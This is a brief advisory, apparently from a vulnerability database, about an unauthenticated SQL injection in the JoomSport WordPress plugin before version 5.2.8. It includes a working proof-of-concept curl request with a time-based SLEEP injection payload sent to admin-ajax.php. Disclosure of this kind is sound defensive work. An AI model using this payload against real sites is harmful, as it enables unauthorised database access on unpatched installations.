The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users
1. Install the vulnerable plugin (joomsport-sports-league-results-management version 5.2.6), skip the demo data import when prompted 2. Invoke the following curl command to induce a 10 second sleep: time curl ‘https://example.com/wp-admin/admin-ajax.php?action=joomsport_md_load’ \ --data ‘mdId=1&shattr;={“id”:“1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -”}’
CPE | Name | Operator | Version |
---|---|---|---|
joomsport-sports-league-results-management | lt | 5.2.8 |